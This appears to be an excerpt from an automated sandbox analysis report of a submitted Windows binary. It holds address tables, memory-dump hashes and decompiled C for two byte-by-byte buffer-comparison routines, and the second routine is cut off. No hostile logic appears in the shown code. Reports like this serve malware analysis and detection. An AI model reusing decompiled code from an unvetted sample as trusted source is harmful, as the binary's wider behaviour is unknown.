                                                                                                      0x004172cd
                                                                                                      0x00000000
                                                                                                      0x00416984
                                                                                                      0x00416956
                                                                                                      0x00416959
                                                                                                      0x00416962
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416962
                                                                                                      0x00416934
                                                                                                      0x00416937
                                                                                                      0x00416940
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416940

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                      • Instruction ID: 638f847b18e9f81e8199c3800a25186ca68dc0cb4b31255244a7ee13f08559fe
                                                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                      • Instruction Fuzzy Hash: 2BC197322091A30ADF1D463984340BFFAA55EA27B131B079FD4B7CB2C5EE28D5A5D61C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00416D4E(void* __edx, void* __esi) {
                                                                                                      				signed int _t197;
                                                                                                      				signed char _t198;
                                                                                                      				signed char _t199;
                                                                                                      				signed char _t200;
                                                                                                      				signed char _t202;
                                                                                                      				signed char _t203;
                                                                                                      				signed int _t246;
                                                                                                      				void* _t294;
                                                                                                      				void* _t297;
                                                                                                      				void* _t299;
                                                                                                      				void* _t301;
                                                                                                      				void* _t303;
                                                                                                      				void* _t305;
                                                                                                      				void* _t307;
                                                                                                      				void* _t309;
                                                                                                      				void* _t311;
                                                                                                      				void* _t313;
                                                                                                      				void* _t315;
                                                                                                      				void* _t317;
                                                                                                      				void* _t319;
                                                                                                      				void* _t321;
                                                                                                      				void* _t323;
                                                                                                      				void* _t325;
                                                                                                      				void* _t327;
                                                                                                      				void* _t329;
                                                                                                      				void* _t331;
                                                                                                      				void* _t333;
                                                                                                      				void* _t335;
                                                                                                      				void* _t336;
                                                                                                      
                                                                                                      				_t336 = __esi;
                                                                                                      				_t294 = __edx;
                                                                                                      				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                                                                                                      					_t246 = 0;
                                                                                                      					L14:
                                                                                                      					if(_t246 != 0) {
                                                                                                      						goto L1;
                                                                                                      					}
                                                                                                      					_t198 =  *(_t336 - 0x1b);
                                                                                                      					if(_t198 ==  *(_t294 - 0x1b)) {
                                                                                                      						_t246 = 0;
                                                                                                      						L25:
                                                                                                      						if(_t246 != 0) {
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      						_t199 =  *(_t336 - 0x17);
                                                                                                      						if(_t199 ==  *(_t294 - 0x17)) {
                                                                                                      							_t246 = 0;
                                                                                                      							L36:
                                                                                                      							if(_t246 != 0) {
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      							_t200 =  *(_t336 - 0x13);
                                                                                                      							if(_t200 ==  *(_t294 - 0x13)) {
                                                                                                      								_t246 = 0;
                                                                                                      								L47:
                                                                                                      								if(_t246 != 0) {
                                                                                                      									goto L1;
                                                                                                      								}
                                                                                                      								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                                                                                                      									_t246 = 0;
                                                                                                      									L58:
                                                                                                      									if(_t246 != 0) {
                                                                                                      										goto L1;
                                                                                                      									}
                                                                                                      									_t202 =  *(_t336 - 0xb);
                                                                                                      									if(_t202 ==  *(_t294 - 0xb)) {
                                                                                                      										_t246 = 0;
                                                                                                      										L69:
                                                                                                      										if(_t246 != 0) {
                                                                                                      											goto L1;
                                                                                                      										}
                                                                                                      										_t203 =  *(_t336 - 7);
                                                                                                      										if(_t203 ==  *(_t294 - 7)) {
                                                                                                      											_t246 = 0;
                                                                                                      											L80:
                                                                                                      											if(_t246 != 0) {
                                                                                                      												goto L1;
                                                                                                      											}
                                                                                                      											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
                                                                                                      											if(_t297 == 0) {
                                                                                                      												L83:
                                                                                                      												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                                                                                                      												if(_t299 == 0) {
                                                                                                      													L3:
                                                                                                      													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                                                                                                      													if(_t246 != 0) {
                                                                                                      														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                                                      													}
                                                                                                      													goto L1;
                                                                                                      												}
                                                                                                      												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                                                                                                      												if(_t246 != 0) {
                                                                                                      													goto L1;
                                                                                                      												} else {
                                                                                                      													goto L3;
                                                                                                      												}
                                                                                                      											}
                                                                                                      											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                                                                                                      											if(_t246 != 0) {
                                                                                                      												goto L1;
                                                                                                      											}
                                                                                                      											goto L83;
                                                                                                      										}
                                                                                                      										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                                                                                                      										if(_t301 == 0) {
                                                                                                      											L73:
                                                                                                      											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                                                                                                      											if(_t303 == 0) {
                                                                                                      												L75:
                                                                                                      												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                                                                                                      												if(_t305 == 0) {
                                                                                                      													L77:
                                                                                                      													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                                                                                                      													if(_t246 != 0) {
                                                                                                      														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                                                      													}
                                                                                                      													goto L80;
                                                                                                      												}
                                                                                                      												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                                                                                                      												if(_t246 != 0) {
                                                                                                      													goto L1;
                                                                                                      												}
                                                                                                      												goto L77;
                                                                                                      											}
                                                                                                      											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                                                                                                      											if(_t246 != 0) {
                                                                                                      												goto L1;
                                                                                                      											}
                                                                                                      											goto L75;
                                                                                                      										}
                                                                                                      										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t246 != 0) {
                                                                                                      											goto L1;
                                                                                                      										}
                                                                                                      										goto L73;
                                                                                                      									}
                                                                                                      									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                                                                                                      									if(_t307 == 0) {
                                                                                                      										L62:
                                                                                                      										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                                                                                                      										if(_t309 == 0) {
                                                                                                      											L64:
                                                                                                      											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                                                                                                      											if(_t311 == 0) {
                                                                                                      												L66:
                                                                                                      												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                                                                                                      												if(_t246 != 0) {
                                                                                                      													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                                                      												}
                                                                                                      												goto L69;
                                                                                                      											}
                                                                                                      											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                                                                                                      											if(_t246 != 0) {
                                                                                                      												goto L1;
                                                                                                      											}
                                                                                                      											goto L66;
                                                                                                      										}
                                                                                                      										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t246 != 0) {
                                                                                                      											goto L1;
                                                                                                      										}
                                                                                                      										goto L64;
                                                                                                      									}
                                                                                                      									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t246 != 0) {
                                                                                                      										goto L1;
                                                                                                      									}
                                                                                                      									goto L62;
                                                                                                      								}
                                                                                                      								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                                                                                                      								if(_t313 == 0) {
                                                                                                      									L51:
                                                                                                      									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                                                                                                      									if(_t315 == 0) {
                                                                                                      										L53:
                                                                                                      										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                                                                                                      										if(_t317 == 0) {
                                                                                                      											L55:
                                                                                                      											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                                                                                                      											if(_t246 != 0) {
                                                                                                      												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                                                      											}
                                                                                                      											goto L58;
                                                                                                      										}
                                                                                                      										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t246 != 0) {
                                                                                                      											goto L1;
                                                                                                      										}
                                                                                                      										goto L55;
                                                                                                      									}
                                                                                                      									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t246 != 0) {
                                                                                                      										goto L1;
                                                                                                      									}
                                                                                                      									goto L53;
                                                                                                      								}
                                                                                                      								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t246 != 0) {
                                                                                                      									goto L1;
                                                                                                      								}
                                                                                                      								goto L51;
                                                                                                      							}
                                                                                                      							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                                                                                                      							if(_t319 == 0) {
                                                                                                      								L40:
                                                                                                      								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                                                                                                      								if(_t321 == 0) {
                                                                                                      									L42:
                                                                                                      									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                                                                                                      									if(_t323 == 0) {
                                                                                                      										L44:
                                                                                                      										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                                                                                                      										if(_t246 != 0) {
                                                                                                      											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                                                      										}
                                                                                                      										goto L47;
                                                                                                      									}
                                                                                                      									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t246 != 0) {
                                                                                                      										goto L1;
                                                                                                      									}
                                                                                                      									goto L44;
                                                                                                      								}
                                                                                                      								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t246 != 0) {
                                                                                                      									goto L1;
                                                                                                      								}
                                                                                                      								goto L42;
                                                                                                      							}
                                                                                                      							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t246 != 0) {
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      							goto L40;
                                                                                                      						}
                                                                                                      						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                                                                                                      						if(_t325 == 0) {
                                                                                                      							L29:
                                                                                                      							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                                                                                                      							if(_t327 == 0) {
                                                                                                      								L31:
                                                                                                      								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                                                                                                      								if(_t329 == 0) {
                                                                                                      									L33:
                                                                                                      									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                                                                                                      									if(_t246 != 0) {
                                                                                                      										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                                                      									}
                                                                                                      									goto L36;
                                                                                                      								}
                                                                                                      								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t246 != 0) {
                                                                                                      									goto L1;
                                                                                                      								}
                                                                                                      								goto L33;
                                                                                                      							}
                                                                                                      							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t246 != 0) {
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      							goto L31;
                                                                                                      						}
                                                                                                      						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                                                                                                      						if(_t246 != 0) {
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      						goto L29;
                                                                                                      					}
                                                                                                      					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                                                                                                      					if(_t331 == 0) {
                                                                                                      						L18:
                                                                                                      						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                                                                                                      						if(_t333 == 0) {
                                                                                                      							L20:
                                                                                                      							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                                                                                                      							if(_t335 == 0) {
                                                                                                      								L22:
                                                                                                      								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                                                                                                      								if(_t246 != 0) {
                                                                                                      									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                                                      								}
                                                                                                      								goto L25;
                                                                                                      							}
                                                                                                      							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t246 != 0) {
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      							goto L22;
                                                                                                      						}
                                                                                                      						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                                                                                                      						if(_t246 != 0) {
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      						goto L20;
                                                                                                      					}
                                                                                                      					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                                                                                                      					if(_t246 != 0) {
                                                                                                      						goto L1;
                                                                                                      					}
                                                                                                      					goto L18;
                                                                                                      				} else {
                                                                                                      					__edi =  *(__esi - 0x1f) & 0x000000ff;
                                                                                                      					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                                                                                                      					if(__edi == 0) {
                                                                                                      						L7:
                                                                                                      						__edi =  *(__esi - 0x1e) & 0x000000ff;
                                                                                                      						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                                                                                      						if(__edi == 0) {
                                                                                                      							L9:
                                                                                                      							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                                                                                      							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                                                                      							if(__edi == 0) {
                                                                                                      								L11:
                                                                                                      								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                                                                                                      								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                                                      								if(__ecx != 0) {
                                                                                                      									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                                                                      								}
                                                                                                      								goto L14;
                                                                                                      							}
                                                                                                      							0 = 0 | __edi > 0x00000000;
                                                                                                      							__ecx = (__edi > 0) * 2 != 1;
                                                                                                      							if((__edi > 0) * 2 != 1) {
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      							goto L11;
                                                                                                      						}
                                                                                                      						0 = 0 | __edi > 0x00000000;
                                                                                                      						__ecx = (__edi > 0) * 2 != 1;
                                                                                                      						if((__edi > 0) * 2 != 1) {
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      						goto L9;
                                                                                                      					}
                                                                                                      					0 = 0 | __edi > 0x00000000;
                                                                                                      					__ecx = (__edi > 0) * 2 != 1;
                                                                                                      					if((__edi > 0) * 2 != 1) {
                                                                                                      						goto L1;
                                                                                                      					}
                                                                                                      					goto L7;
                                                                                                      				}
                                                                                                      				L1:
                                                                                                      				_t197 = _t246;
                                                                                                      				return _t197;
                                                                                                      			}
































                                                                                                      0x00416d4e
                                                                                                      0x00416d4e
                                                                                                      0x00416d54
                                                                                                      0x00416ddc
                                                                                                      0x00416dde
                                                                                                      0x00416de0
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416de6
                                                                                                      0x00416dec
                                                                                                      0x00416e73
                                                                                                      0x00416e75
                                                                                                      0x00416e77
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416e7d
                                                                                                      0x00416e83
                                                                                                      0x00416f0a
                                                                                                      0x00416f0c
                                                                                                      0x00416f0e
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416f14
                                                                                                      0x00416f1a
                                                                                                      0x00416fa1
                                                                                                      0x00416fa3
                                                                                                      0x00416fa5
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416fb1
                                                                                                      0x00417039
                                                                                                      0x0041703b
                                                                                                      0x0041703d
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00417043
                                                                                                      0x00417049
                                                                                                      0x004170d0
                                                                                                      0x004170d2
                                                                                                      0x004170d4
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004170da
                                                                                                      0x004170e0
                                                                                                      0x00417167
                                                                                                      0x00417169
                                                                                                      0x0041716b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00417179
                                                                                                      0x0041717b
                                                                                                      0x00417193
                                                                                                      0x0041719b
                                                                                                      0x0041719d
                                                                                                      0x004168f6
                                                                                                      0x004168fe
                                                                                                      0x00416900
                                                                                                      0x0041690d
                                                                                                      0x0041690d
                                                                                                      0x00000000
                                                                                                      0x00416900
                                                                                                      0x004171aa
                                                                                                      0x004168f0
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004168f0
                                                                                                      0x00417184
                                                                                                      0x0041718d
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041718d
                                                                                                      0x004170ed
                                                                                                      0x004170ef
                                                                                                      0x00417107
                                                                                                      0x0041710f
                                                                                                      0x00417111
                                                                                                      0x00417129
                                                                                                      0x00417131
                                                                                                      0x00417133
                                                                                                      0x0041714b
                                                                                                      0x00417153
                                                                                                      0x00417155
                                                                                                      0x0041715e
                                                                                                      0x0041715e
                                                                                                      0x00000000
                                                                                                      0x00417155
                                                                                                      0x0041713c
                                                                                                      0x00417145
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00417145
                                                                                                      0x0041711a
                                                                                                      0x00417123
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00417123
                                                                                                      0x004170f8
                                                                                                      0x00417101
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00417101
                                                                                                      0x00417056
                                                                                                      0x00417058
                                                                                                      0x00417070
                                                                                                      0x00417078
                                                                                                      0x0041707a
                                                                                                      0x00417092
                                                                                                      0x0041709a
                                                                                                      0x0041709c
                                                                                                      0x004170b4
                                                                                                      0x004170bc
                                                                                                      0x004170be
                                                                                                      0x004170c7
                                                                                                      0x004170c7
                                                                                                      0x00000000
                                                                                                      0x004170be
                                                                                                      0x004170a5
                                                                                                      0x004170ae
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004170ae
                                                                                                      0x00417083
                                                                                                      0x0041708c
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041708c
                                                                                                      0x00417061
                                                                                                      0x0041706a
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041706a
                                                                                                      0x00416fbf
                                                                                                      0x00416fc1
                                                                                                      0x00416fd9
                                                                                                      0x00416fe1
                                                                                                      0x00416fe3
                                                                                                      0x00416ffb
                                                                                                      0x00417003
                                                                                                      0x00417005
                                                                                                      0x0041701d
                                                                                                      0x00417025
                                                                                                      0x00417027
                                                                                                      0x00417030
                                                                                                      0x00417030
                                                                                                      0x00000000
                                                                                                      0x00417027
                                                                                                      0x0041700e
                                                                                                      0x00417017
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00417017
                                                                                                      0x00416fec
                                                                                                      0x00416ff5
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416ff5
                                                                                                      0x00416fca
                                                                                                      0x00416fd3
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416fd3
                                                                                                      0x00416f27
                                                                                                      0x00416f29
                                                                                                      0x00416f41
                                                                                                      0x00416f49
                                                                                                      0x00416f4b
                                                                                                      0x00416f63
                                                                                                      0x00416f6b
                                                                                                      0x00416f6d
                                                                                                      0x00416f85
                                                                                                      0x00416f8d
                                                                                                      0x00416f8f
                                                                                                      0x00416f98
                                                                                                      0x00416f98
                                                                                                      0x00000000
                                                                                                      0x00416f8f
                                                                                                      0x00416f76
                                                                                                      0x00416f7f
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416f7f
                                                                                                      0x00416f54
                                                                                                      0x00416f5d
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416f5d
                                                                                                      0x00416f32
                                                                                                      0x00416f3b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416f3b
                                                                                                      0x00416e90
                                                                                                      0x00416e92
                                                                                                      0x00416eaa
                                                                                                      0x00416eb2
                                                                                                      0x00416eb4
                                                                                                      0x00416ecc
                                                                                                      0x00416ed4
                                                                                                      0x00416ed6
                                                                                                      0x00416eee
                                                                                                      0x00416ef6
                                                                                                      0x00416ef8
                                                                                                      0x00416f01
                                                                                                      0x00416f01
                                                                                                      0x00000000
                                                                                                      0x00416ef8
                                                                                                      0x00416edf
                                                                                                      0x00416ee8
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416ee8
                                                                                                      0x00416ebd
                                                                                                      0x00416ec6
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416ec6
                                                                                                      0x00416e9b
                                                                                                      0x00416ea4
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416ea4
                                                                                                      0x00416df9
                                                                                                      0x00416dfb
                                                                                                      0x00416e13
                                                                                                      0x00416e1b
                                                                                                      0x00416e1d
                                                                                                      0x00416e35
                                                                                                      0x00416e3d
                                                                                                      0x00416e3f
                                                                                                      0x00416e57
                                                                                                      0x00416e5f
                                                                                                      0x00416e61
                                                                                                      0x00416e6a
                                                                                                      0x00416e6a
                                                                                                      0x00000000
                                                                                                      0x00416e61
                                                                                                      0x00416e48
                                                                                                      0x00416e51
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416e51
                                                                                                      0x00416e26
                                                                                                      0x00416e2f
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416e2f
                                                                                                      0x00416e04
                                                                                                      0x00416e0d
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416d5a
                                                                                                      0x00416d5e
                                                                                                      0x00416d62
                                                                                                      0x00416d64
                                                                                                      0x00416d7c
                                                                                                      0x00416d7c
                                                                                                      0x00416d84
                                                                                                      0x00416d86
                                                                                                      0x00416d9e
                                                                                                      0x00416d9e
                                                                                                      0x00416da6
                                                                                                      0x00416da8
                                                                                                      0x00416dc0
                                                                                                      0x00416dc0
                                                                                                      0x00416dc8
                                                                                                      0x00416dca
                                                                                                      0x00416dd3
                                                                                                      0x00416dd3
                                                                                                      0x00000000
                                                                                                      0x00416dca
                                                                                                      0x00416dae
                                                                                                      0x00416db1
                                                                                                      0x00416dba
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416dba
                                                                                                      0x00416d8c
                                                                                                      0x00416d8f
                                                                                                      0x00416d98
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416d98
                                                                                                      0x00416d6a
                                                                                                      0x00416d6d
                                                                                                      0x00416d76
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416d76
                                                                                                      0x004164dc
                                                                                                      0x004164dc
                                                                                                      0x004172cd

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                      • Instruction ID: cf2e26c8fab931841b5b5b98056a3382e25168eebd44b1025704d11944039681
                                                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                      • Instruction Fuzzy Hash: CFC1B7362091A30DDF2D4639C4341BFBAA15AA27B131B07AFD4B7CB2C5EE28C5A5D51C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E004164E4(void* __edx, void* __esi) {
                                                                                                      				signed int _t184;
                                                                                                      				signed char _t185;
                                                                                                      				signed char _t186;
                                                                                                      				signed char _t187;
                                                                                                      				signed char _t188;
                                                                                                      				signed char _t190;
                                                                                                      				signed int _t231;
                                                                                                      				void* _t275;
                                                                                                      				void* _t278;
                                                                                                      				void* _t280;
                                                                                                      				void* _t282;
                                                                                                      				void* _t284;
                                                                                                      				void* _t286;
                                                                                                      				void* _t288;
                                                                                                      				void* _t290;
                                                                                                      				void* _t292;
                                                                                                      				void* _t294;
                                                                                                      				void* _t296;
                                                                                                      				void* _t298;
                                                                                                      				void* _t300;
                                                                                                      				void* _t302;
                                                                                                      				void* _t304;
                                                                                                      				void* _t306;
                                                                                                      				void* _t308;
                                                                                                      				void* _t310;
                                                                                                      				void* _t312;
                                                                                                      				void* _t313;
                                                                                                      
                                                                                                      				_t313 = __esi;
                                                                                                      				_t275 = __edx;
                                                                                                      				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
                                                                                                      					_t231 = 0;
                                                                                                      					L11:
                                                                                                      					if(_t231 != 0) {
                                                                                                      						goto L1;
                                                                                                      					}
                                                                                                      					_t185 =  *(_t313 - 0x19);
                                                                                                      					if(_t185 ==  *(_t275 - 0x19)) {
                                                                                                      						_t231 = 0;
                                                                                                      						L22:
                                                                                                      						if(_t231 != 0) {
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      						_t186 =  *(_t313 - 0x15);
                                                                                                      						if(_t186 ==  *(_t275 - 0x15)) {
                                                                                                      							_t231 = 0;
                                                                                                      							L33:
                                                                                                      							if(_t231 != 0) {
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      							_t187 =  *(_t313 - 0x11);
                                                                                                      							if(_t187 ==  *(_t275 - 0x11)) {
                                                                                                      								_t231 = 0;
                                                                                                      								L44:
                                                                                                      								if(_t231 != 0) {
                                                                                                      									goto L1;
                                                                                                      								}
                                                                                                      								_t188 =  *(_t313 - 0xd);
                                                                                                      								if(_t188 ==  *(_t275 - 0xd)) {
                                                                                                      									_t231 = 0;
                                                                                                      									L55:
                                                                                                      									if(_t231 != 0) {
                                                                                                      										goto L1;
                                                                                                      									}
                                                                                                      									if( *(_t313 - 9) ==  *(_t275 - 9)) {
                                                                                                      										_t231 = 0;
                                                                                                      										L66:
                                                                                                      										if(_t231 != 0) {
                                                                                                      											goto L1;
                                                                                                      										}
                                                                                                      										_t190 =  *(_t313 - 5);
                                                                                                      										if(_t190 ==  *(_t275 - 5)) {
                                                                                                      											_t231 = 0;
                                                                                                      											L77:
                                                                                                      											if(_t231 == 0) {
                                                                                                      												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
                                                                                                      												if(_t231 != 0) {
                                                                                                      													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                                                      												}
                                                                                                      											}
                                                                                                      											goto L1;
                                                                                                      										}
